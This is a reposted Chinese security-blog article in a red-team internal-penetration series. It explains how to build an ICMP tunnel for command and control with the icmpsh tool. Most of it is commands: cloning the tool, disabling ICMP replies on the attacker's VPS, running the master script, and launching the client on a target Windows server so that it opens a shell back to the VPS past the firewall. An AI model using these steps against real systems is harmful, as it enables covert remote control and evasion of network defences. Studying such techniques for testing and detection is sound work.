本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安世加的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
欢迎各位添加微信号:asj-jacky
加入安世加 交流群 和大佬们一起交流安全技术
目录
ICMP隧道
使用ICMP进行命令控制(Icmpsh)
ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。
在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙一般不会屏蔽ping的数据包),实现不受限制的访问访问。
适用场景:目标机器是Windows服务器的情况
git clone https://github.com/inquisb/icmpsh.git #先下载icmpsh工具
VPS的操作:
sysctl -w net.ipv4.icmp_echo_ignore_all=1 #关闭icmp回复,如果要开启icmp回复,该值设置为0
python2 icmpsh_m.py 172.31.226.161 x.x.x.x #运行,第一个IP是VPS的eth0网卡IP,第二个IP是目标机器出口的公网IP
目标机器的操作:
icmpsh.exe -t x.x.x.x -d 500 -b 30 -s 128
抓包,可以看到两者之间通信都是icmp的数据包
内网渗透(十七) | 内网转发及隐蔽隧道:使用SSH做端口转发以及反向隧道
内网渗透 | 红蓝对抗:Windows利用WinRM实现端口复用打造隐蔽后门
内网渗透(十五) | psexec工具使用浅析(admin$)
内网渗透(十一) | 哈希传递攻击(Pass-the-Hash,PtH)
技术干货 | 工具:Social engineering tookit 钓鱼网站
技术干货 | 工具的使用:CobaltStrike上线Linux主机(CrossC2)
内网渗透(七) | 内网转发及隐蔽隧道:网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
本文始发于微信公众号(安世加):内网渗透(十九)| 内网转发及隐蔽隧道:使用ICMP进行命令控制(Icmpsh)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论